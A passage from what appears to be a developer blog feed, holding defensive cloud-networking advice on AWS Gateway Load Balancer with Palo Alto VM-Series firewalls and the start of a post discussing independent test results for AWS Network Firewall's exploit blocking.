&lt;li&gt;The packet is forwarded to the Gateway Load Balancer Endpoint in the subnet in AZ B. The packet is then forwarded to the Gateway Load Balancer, which forwards it to the VM-Series in AZ B.&lt;/li&gt;
&lt;li&gt;The VM-Series in AZ B receives the packet and thinks, "What is this? I have no idea what this session is about."&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DROP.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Fortunately, solving this problem is incredibly simple (but only if you understand the problem). In the Transit Gateway VPC attachment configuration, simply enable the &lt;strong&gt;Appliance Mode&lt;/strong&gt; option. This changes TGW's forwarding logic from AZ affinity to a &lt;strong&gt;flow hash based on the 4-tuple&lt;/strong&gt; (source IP, destination IP, source port, destination port) - ensuring both directions of a flow are always delivered to the same AZ in the Security VPC. &lt;strong&gt;This option is not enabled by default.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/vpc/latest/tgw/transit-gateway-appliance-scenario.html" rel="noopener noreferrer"&gt;AWS Docs: Transit Gateway Appliance Mode&lt;/a&gt;, &lt;a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/inline-traffic-inspection-third-party-appliances/transit-gateway-asymmetric-routing.html" rel="noopener noreferrer"&gt;AWS Prescriptive Guidance: Transit Gateway asymmetric routing&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Fail-open when all targets are unhealthy
&lt;/h2&gt;

&lt;p&gt;Imagine an extremely rare, but still possible, situation. All your firewalls in all AZs in your Security VPC become inoperable for some reason. The Target Group associated with GWLB sees them all as unhealthy. What comes to mind first? That GWLB will drop traffic and not forward it to unhealthy instances. This seems logical, but it's a shame it's not true.&lt;/p&gt;

&lt;p&gt;GWLB will go into fail-open mode. What does this mean for you? It depends. If the firewall is in a crashed or terminated status, the traffic will indeed stop at the firewall and be dropped. However, if the firewall is in an up state but health checks fail (e.g., due to a CPU spike, a license expiry, or a bad Panorama push), the firewall can let this traffic through without inspection. This is a real security bypass.&lt;/p&gt;

&lt;p&gt;How can you protect against this? There are several options.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Configuring alerts on CloudWatch for &lt;code&gt;UnHealthyHostCount&lt;/code&gt; is a must - so you're at least aware that there might be a threat.&lt;/li&gt;
&lt;li&gt;Configuring &lt;code&gt;target_failover.on_unhealthy&lt;/code&gt; to &lt;code&gt;rebalance&lt;/code&gt; will rehash flows to healthy targets. Note that this helps when &lt;em&gt;some&lt;/em&gt; targets are unhealthy - if all targets are down, there's nowhere to rebalance to.&lt;/li&gt;
&lt;li&gt;A great, though slightly more advanced, solution is to use a Lambda-based kill switch. If such a situation occurs, the function should modify the routing tables to blackhole traffic.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/gateway/health-checks.html" rel="noopener noreferrer"&gt;AWS Docs: Health checks for GWLB target groups&lt;/a&gt;, &lt;a href="https://docs.aws.amazon.com/whitepapers/latest/building-scalable-secure-multi-vpc-network-infrastructure/using-gwlb-with-tg-for-cns.html" rel="noopener noreferrer"&gt;AWS Whitepaper: GWLB with TGW for centralized security&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3. The real cost stack
&lt;/h2&gt;

&lt;p&gt;It's generally accepted that the price for GWLB is around $0.014 per hour per AZ. Well, that's true, but that's just GWLB. The table lists all the ACTUAL costs:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Cost basis&lt;/th&gt;
&lt;th&gt;3-AZ, 2 FW/AZ, 1TB/mo&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GWLB hourly&lt;/td&gt;
&lt;td&gt;$0.014/AZ-hour&lt;/td&gt;
&lt;td&gt;$31&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLB usage (GLCU)&lt;/td&gt;
&lt;td&gt;$0.004/GLCU-hour&lt;/td&gt;
&lt;td&gt;~$50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLBE hourly (PrivateLink)&lt;/td&gt;
&lt;td&gt;$0.011/hour per endpoint&lt;/td&gt;
&lt;td&gt;$24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLBE data processing&lt;/td&gt;
&lt;td&gt;$0.01/GB&lt;/td&gt;
&lt;td&gt;$10&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-AZ data transfer&lt;/td&gt;
&lt;td&gt;$0.01/GB each direction&lt;/td&gt;
&lt;td&gt;$20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGW attachment&lt;/td&gt;
&lt;td&gt;$0.07/hour per attachment&lt;/td&gt;
&lt;td&gt;$153&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGW data processing&lt;/td&gt;
&lt;td&gt;$0.02/GB&lt;/td&gt;
&lt;td&gt;$20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EC2 instances (6x c5n.xlarge)&lt;/td&gt;
&lt;td&gt;~$0.34/h per instance&lt;/td&gt;
&lt;td&gt;$1,489&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Subtotal (infra only)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$1,797/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VM-Series PAYG license&lt;/td&gt;
&lt;td&gt;$1.71/h per instance&lt;/td&gt;
&lt;td&gt;$7,490&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total with PAYG&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$9,287/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VM-Series BYOL license (amortized)&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;~$2,400-3,600&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total with BYOL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$4,197-5,397/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;As you can see, your monthly invoice doesn't include just the GWLB itself. You budgeted around $500, and at the end of the month, you receive an invoice for ~$9,000 (depending on the region). Consider an alternative - perhaps a native AWS firewall will suffice for your needs, costing &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;around $750 per month&lt;/a&gt;. (But of course, this also cuts out many features - I described this in more detail in &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;this article&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;And another "pleasant" surprise: if you configure cross-zone load balancing on GWLB, remember that you pay $0.01/GB for each cross-AZ hop. This option is worth considering when planning your HA architecture.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://aws.amazon.com/elasticloadbalancing/pricing/" rel="noopener noreferrer"&gt;AWS ELB Pricing&lt;/a&gt;, &lt;a href="https://aws.amazon.com/privatelink/pricing/" rel="noopener noreferrer"&gt;AWS PrivateLink Pricing&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Palo Alto overlay routing - not a silver bullet
&lt;/h2&gt;

&lt;p&gt;Overlay Routing in VM-Series can be a great solution. We don't need to create separate NAT Gateways native to AWS; traffic to the internet exits directly through the firewall's public interface. And that's all great, but this configuration will only work for outbound traffic.&lt;/p&gt;

&lt;p&gt;What about inbound traffic? The firewall will inspect the packet, apply overlay routing, and instead of returning the packet back through the GWLB endpoint, it will send it out through its public interface. The result - asymmetric routing and dropped connections.&lt;/p&gt;

&lt;p&gt;East-west traffic (VPC-to-VPC) in a centralized TGW architecture is a different story - it actually &lt;strong&gt;works fine&lt;/strong&gt; with overlay routing. The packets have private destination IPs, so the firewall's L3 lookup routes them back via the GENEVE interface, not out the public interface.&lt;/p&gt;

&lt;p&gt;But there are solutions for combined traffic too.&lt;/p&gt;

&lt;p&gt;First and foremost, consider whether you really need overlay routing. If it's only going to inspect outbound traffic, then yes, it's a shame not to take advantage of this option.&lt;/p&gt;

&lt;p&gt;If you need inbound traffic handling but don't want to give up overlay routing, don't worry. You'll need to spend a bit more time on configuring subinterfaces and virtual routers, but it can be done while maintaining full functionality.&lt;/p&gt;

&lt;p&gt;One more thing worth mentioning - there was a confirmed bug (PAN-229985, fixed in PAN-OS 11.1.3) where GWLB overlay routing packets were re-encapsulated with an incorrect flow cookie in the GENEVE header. Some of the &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;issues reported on LIVEcommunity&lt;/a&gt; may have been caused by this bug rather than an architectural limitation. Make sure you're running a version with this fix.&lt;/p&gt;

&lt;p&gt;Finally, before you decide to deploy this solution to production, test it in a test environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.paloaltonetworks.com/vm-series/11-0/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer/integrate-the-vm-series-with-an-aws-gateway-load-balancer/enable-overlay-routing-for-the-vm-series-on-aws" rel="noopener noreferrer"&gt;Palo Alto: Enable Overlay Routing for VM-Series on AWS&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/clarity-on-overlay-routing-with-gwlb-for-combined-centralized/td-p/575909" rel="noopener noreferrer"&gt;LIVEcommunity: Overlay Routing with GWLB for Combined Model (SOLVED)&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;LIVEcommunity: Issues with Overlay Routing and GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  5. PAN-OS version roulette
&lt;/h2&gt;

&lt;p&gt;Remember - there's no operating system in the world that's bug-free. PAN-OS is no exception. Some versions of PAN-OS have problems coexisting with GWLB, particularly when overlay routing is enabled:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;PAN-OS Version&lt;/th&gt;
&lt;th&gt;GWLB Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;10.1.5-h5&lt;/td&gt;
&lt;td&gt;Working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.1.6&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Broken&lt;/strong&gt; (fix in 10.1.6-h6)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10.1.7&lt;/td&gt;
&lt;td&gt;Working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.2.2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Broken&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.2.3-h2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Issues reported&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11.0.0 (EOL)&lt;/td&gt;
&lt;td&gt;Issues reported&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;We usually assume that the newer version will be better than the previous one. We decide to upgrade (because who would test anyway...). Well, we updated our version to the latest one and... something's not right. Gateway Load Balancer Endpoints don't work, but they don't show any errors either.&lt;/p&gt;

&lt;p&gt;The solution is brutally simple, but many users seem to forget this. TEST the new PAN-OS version in a non-production environment. Don't go straight to production with untested software. When you buy new running shoes, do you immediately wear them in the most important race of your life, or do you test them during training sessions to make sure they really suit you?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;LIVEcommunity: Overlay Routing + GWLB issues&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/general-topics/aws-gwlb-vpc-endpoint-associations-no-longer-work-post-upgrade/td-p/627319" rel="noopener noreferrer"&gt;LIVEcommunity: GWLB VPC Endpoint broken post-upgrade&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  6. NAT on the firewall breaks traffic
&lt;/h2&gt;

&lt;p&gt;Are you an administrator managing firewalls at your on-prem location and have been tasked with deploying VM-Series in the cloud? I'd bet your intuition (and probably rightly so) tells you that one of the most important configurations will be the correct NAT settings on the firewalls. You apply the same pattern to the Cloud Firewall with GWLB and... it doesn't work? No wonder.&lt;/p&gt;

&lt;p&gt;GWLB validates the 5-tuple of return packets against its connection state table. If you've set up DNAT on the firewall, the 5-tuple no longer matches, so GWLB will drop the packet. But don't make it too easy - you won't get a clear error (and forget about the logs).&lt;/p&gt;

&lt;p&gt;When using GWLB, you don't need to NAT on the VM-Series. If you carefully examine the architecture (the one at the beginning of the article), you'll notice that using a NAT Gateway is enough to handle outbound traffic. Unless you're using overlay routing (see section 4), in which case the firewall handles outbound NAT directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://repost.aws/questions/QUs-FovHmIRLKcSJWrGhESiQ/nat-on-palo-fw-appliance-with-gateway-load-balancer-instead-of-using-nat-gateway" rel="noopener noreferrer"&gt;AWS re:Post: NAT on Palo FW with GWLB&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/networking-and-content-delivery/best-practices-for-deploying-gateway-load-balancer/" rel="noopener noreferrer"&gt;AWS Best practices for GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  7. The debugging nightmare
&lt;/h2&gt;

&lt;p&gt;Gateway Load Balancer is a brilliant AWS solution... but not for debugging traffic problems.&lt;/p&gt;

&lt;p&gt;Colloquially speaking, even VPC Flow Logs won't help here. The problem is that GWLB encapsulates traffic with the GENEVE protocol on UDP port 6081. Instead of the actual source and destination addresses, you'll see some private addressing that tells you nothing.&lt;/p&gt;

&lt;p&gt;Make one mistake in any routing table and you're in... a black hole. Look at the architecture diagram to see how many routing tables appear in the VPC itself (and add the corresponding routing tables in TGW, in the Spoke VPCs). You have to be careful, and honestly, I don't have a silver bullet.&lt;/p&gt;

&lt;p&gt;What can help?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Flow Logs on Gateway Load Balancer Endpoint interface with custom fields: &lt;code&gt;${pkt-srcaddr}&lt;/code&gt;, &lt;code&gt;${pkt-dstaddr}&lt;/code&gt;, &lt;code&gt;${flow-direction}&lt;/code&gt;, &lt;code&gt;${tcp-flags}&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Logs directly on VM-Series&lt;/li&gt;
&lt;li&gt;AWS &lt;a href="https://docs.aws.amazon.com/vpc/latest/reachability/what-is-reachability-analyzer.html" rel="noopener noreferrer"&gt;Reachability Analyzer&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Simultaneous tcpdump on client, server, and firewall interfaces&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  8. One Security VPC or two?
&lt;/h2&gt;

&lt;p&gt;If you need to inspect both east-west (VPC-to-VPC) and north-south (internet ingress/egress) traffic, you might wonder whether one Security VPC is enough.&lt;/p&gt;

&lt;p&gt;The good news - a single Security VPC with Appliance Mode ON works for both traffic types. North-south traffic is not broken by Appliance Mode. For internet-bound traffic (where the destination has no AZ), TGW with Appliance Mode selects the ENI in the source AZ anyway - so it behaves almost identically to the default AZ affinity.&lt;/p&gt;

&lt;p&gt;So why do some AWS guides recommend two separate Security VPCs? The answer is &lt;strong&gt;resilience&lt;/strong&gt;, not cost (TGW cross-AZ data transfer has been &lt;a href="https://aws.amazon.com/about-aws/whats-new/2022/04/aws-data-transfer-price-reduction-privatelink-transit-gateway-client-vpn-services/" rel="noopener noreferrer"&gt;free since April 2022&lt;/a&gt;). With Appliance Mode ON, TGW uses a flow hash that can send traffic from a healthy AZ to appliances in an impaired AZ. With Appliance Mode OFF, AZ affinity isolates the blast radius - if AZ1 goes down, AZ2 traffic continues unaffected.&lt;/p&gt;

&lt;p&gt;In practice, there are three options:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;One Security VPC with Appliance Mode ON&lt;/strong&gt; - works for both E-W and N-S. Simpler to manage, accepts the resilience trade-off. This is what most deployments use.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Two Security VPCs&lt;/strong&gt; - one for E-W (Appliance Mode ON), one for N-S (Appliance Mode OFF). Maximum AZ isolation, but double the infrastructure and operational overhead.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One Security VPC with Appliance Mode OFF&lt;/strong&gt; - breaks east-west inspection. Don't do this.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;One more thing to keep in mind: in multi-account setups, &lt;a href="https://awslabs.github.io/landing-zone-accelerator-on-aws/latest/faq/networking/gwlb/" rel="noopener noreferrer"&gt;AZ names map to different physical zones per account&lt;/a&gt; - use AZ IDs (e.g., &lt;code&gt;use1-az1&lt;/code&gt;), not names.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/whitepapers/latest/building-scalable-secure-multi-vpc-network-infrastructure/using-gwlb-with-tg-for-cns.html" rel="noopener noreferrer"&gt;AWS Whitepaper: GWLB with TGW for centralized security&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/apn/centralized-traffic-inspection-with-gateway-load-balancer-on-aws/" rel="noopener noreferrer"&gt;AWS APN Blog: Centralized traffic inspection with GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  9. IMDSv2 and bootstrap - check your PAN-OS version
&lt;/h2&gt;

&lt;p&gt;Not all versions of the PAN-OS VM-Series support IMDSv2. When I first encountered this problem, I thought I was going to lose all my hair. The process was standard: set the bootstrap in userdata, everything looked perfect, and... nothing bootstrapped. I scoured the internet for the problem, which turned out to be a single small checkbox in the virtual machine configuration - "Enable IMDSv2." I unchecked it, redeployed it with the same bootstrap - eureka! Everything is working as it should.&lt;/p&gt;

&lt;p&gt;That was on an older PAN-OS version. The good news is that Palo Alto has been supporting IMDSv2 since 2022:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BYOL: PAN-OS 10.2.0+ with VM-Series Plugin 3.0.0+&lt;/li&gt;
&lt;li&gt;PAYG: PAN-OS 10.2.5+ with Plugin 3.0.0+&lt;/li&gt;
&lt;li&gt;Panorama: PAN-OS 10.2.3+&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The only thing you need to set is EC2 metadata:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;metadata_options&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;http_endpoint&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"enabled"&lt;/span&gt;
  &lt;span class="nx"&gt;http_tokens&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"required"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note this if for some reason your bootstrap won't work.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CqfQCAS" rel="noopener noreferrer"&gt;Palo Alto KB: IMDSv2 support for VM firewall and Panorama in AWS&lt;/a&gt;, &lt;a href="https://docs.paloaltonetworks.com/plugins/vm-series-and-panorama-plugins-release-notes/vm-series-plugin/vm-series-plugin-30/vm-series-plugin-300" rel="noopener noreferrer"&gt;VM-Series Plugin 3.0.0 Release Notes&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  So what should you do with all this information?
&lt;/h2&gt;

&lt;p&gt;Generally, do what you feel is right, but I suggest answering a few important questions before implementing:&lt;/p&gt;

&lt;p&gt;Is your environment truly sensitive enough to require centralized traffic inspection? Is the data stored in your environment highly sensitive? If you answered yes to both questions, then you need this solution. If you have any doubts, reconsider - maybe a &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;native AWS firewall&lt;/a&gt; will suffice?&lt;/p&gt;

&lt;p&gt;Do you have experience configuring Palo Alto hardware? Without it, it will be difficult to navigate the initial process without wading through reams of documentation. It's not just the VM-Series configuration itself, but also the AWS configuration at both the network and resource levels. You can always ask Palo Alto for a dedicated specialist, who will handle this for you... But you'll also pay for that.&lt;/p&gt;

&lt;p&gt;Consider whether you can afford this solution. It's not a small amount. Go through section 3 again and judge for yourself.&lt;/p&gt;

&lt;p&gt;Remember that simply implementing VM-Series in production can be risky. It's good to have at least a minimal test environment to test your configuration before rolling it out to production, as you could shut down your business and not know why.&lt;/p&gt;

&lt;p&gt;If you have no doubts about the above and are able to meet all of the above requirements, go for it; this solution is for you.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building a centralized Security VPC on AWS with GWLB? I've deployed this architecture for enterprise clients and know where the bodies are buried. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Network Firewall blocked 0.59% of exploits in independent testing - what this means for your cloud</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Sun, 08 Mar 2026 20:30:55 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-network-firewall-blocked-059-of-exploits-in-independent-testing-what-this-means-for-your-51p6</link>
      <guid>https://dev.to/haitmg/aws-network-firewall-blocked-059-of-exploits-in-independent-testing-what-this-means-for-your-51p6</guid>
      <description>&lt;p&gt;In the spring of 2025, the results of a test comparing cloud firewalls were published on the &lt;a href="https://cyberratings.org/cyberratings-org-publishes-test-results-on-cloud-network-firewalls/" rel="noopener noreferrer"&gt;CyberRatings.org&lt;/a&gt; laboratory website. Ten providers were included in the test. The AWS firewall blocked &lt;strong&gt;0.59% of exploits&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When additional bypass tests were applied, the effectiveness dropped to &lt;strong&gt;0%&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In my DevOps career, I have implemented both native AWS firewalls and those from Palo Alto (VM-Series and CNGFW). To this day, some customers still use the AWS firewall. This article is not a criticism; it is a realistic and objective (at least I hope so) look at what these numbers actually mean, what you should do with them, and what to keep in mind if you use the AWS Network Firewall.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three rounds of testing, same result
&lt;/h2&gt;

&lt;p&gt;First and foremost, it's worth noting: this wasn't a one-time test. CyberRatings tested the AWS firewall three times:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-network-firewall/" rel="noopener noreferrer"&gt;April 2024&lt;/a&gt;&lt;/strong&gt; - 11 vendors were tested for 984 exploits and 1,645 bypasses. AWS scored &lt;strong&gt;5.39% security effectiveness&lt;/strong&gt; - the lowest among all tested vendors. The rating was "Caution" (6 vendors received "Recommended," 1 "Neutral," and 4 "Caution").&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-service-provider-native-firewalls/" rel="noopener noreferrer"&gt;November 2024&lt;/a&gt;&lt;/strong&gt; - Minitest. Only native AWS, Azure, and GCP firewalls were considered in the test. AWS achieved a result of &lt;strong&gt;0.38% of blocked exploits&lt;/strong&gt; (2 out of 522). Their counterparts - Azure 24.14%, GCP 50.57%. Keysight CyPerf v5.0 was used as the test platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberscoop.com/independent-tests-show-why-orgs-should-use-third-party-cloud-security-services/" rel="noopener noreferrer"&gt;April 2025&lt;/a&gt;&lt;/strong&gt; - Firewall Comparison Report for Q1 2025. Ten vendors were tested for &lt;strong&gt;2,028 exploits&lt;/strong&gt; and &lt;strong&gt;2,500 attacks using 27 techniques&lt;/strong&gt;. AWS (horror of horrors) &lt;strong&gt;0.59%&lt;/strong&gt;. After security bypass tests, &lt;strong&gt;0%&lt;/strong&gt;. For comparison - the largest vendors (Check Point, Fortinet, Juniper, Palo Alto Networks, Versa) from &lt;strong&gt;99.61% to 100%&lt;/strong&gt;. The differences are dramatic.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wait - 0% doesn't mean "does nothing"
&lt;/h2&gt;

&lt;p&gt;And here's a moment to pause - 0% doesn't mean the firewall is doing nothing. Before you give up on your AWS firewall, let me explain what these results really mean.&lt;/p&gt;

&lt;p&gt;CyberRatings tests exploits and resilience against signature-based vulnerabilities (CVEs) from the last 10 years, which use various techniques to bypass security at layers 3, 4, and 7 of the OSI model. The key is that AWS Firewall wasn't designed as an IPS/IDS system in the traditional sense. It's a resource managed by Suricata with a specific set of features (domain filtering, IP/port rules, and POSSIBLY &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/aws-managed-rule-groups-threat-signature.html" rel="noopener noreferrer"&gt;threat signature management&lt;/a&gt;). Its primary purpose is network segmentation and traffic filtering - NOT catching exploits based on the CVE database.&lt;/p&gt;

&lt;p&gt;The problem is that AWS sells its firewalls with advertising phrases like "intrusion prevention" and "threat detection." Well, since you're paying for IPS rule groups and just over half a percent of exploits are detected, it's probably a problem, regardless of the design assumptions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why such low results? Here's a technical explanation.
&lt;/h2&gt;

&lt;p&gt;In my career, I've worked with both Suricata firewalls and those supporting App-ID. The difference stems from the underlying architecture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Suricata in AWS NFW
&lt;/h3&gt;

&lt;p&gt;AWS runs &lt;a href="https://aws.amazon.com/blogs/opensource/scaling-threat-prevention-on-aws-with-suricata/" rel="noopener noreferrer"&gt;Suricata&lt;/a&gt; in the background. Suricata is an open-source IPS system, but AWS NFW &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/suricata-limitations-caveats.html" rel="noopener noreferrer"&gt;does not support&lt;/a&gt; all of its functionality:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lua scripts&lt;/strong&gt; - most advanced Suricata rules use them for complex detection logic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File extraction&lt;/strong&gt; - no downloading for analysis&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iprep&lt;/strong&gt; - no IP scoring&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Datasets/datarep&lt;/strong&gt; - no custom data matching&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IKEv2 and IP-in-IP protocol detection&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;pcre&lt;/strong&gt; is limited to working only with content, tls.sni, http.host, and dns.query&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This shouldn't be underestimated. Lua scripts alone significantly enhance Suricata's detection. Without them, you're only using a fraction of its capabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Stateful and Stateless Switching Problem
&lt;/h3&gt;

&lt;p&gt;This is the technical cause of the problem identified by CyberRatings.&lt;/p&gt;

&lt;p&gt;AWS NFW processes traffic in two stages. First, through the &lt;strong&gt;stateless engine&lt;/strong&gt; (5-tuple matching), and then optionally through the &lt;strong&gt;stateful engine&lt;/strong&gt; (Suricata). Unfortunately, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/firewall-rules-engines.html" rel="noopener noreferrer"&gt;stateless rules have a higher priority&lt;/a&gt; and typically interfere with stateful inspection.&lt;/p&gt;

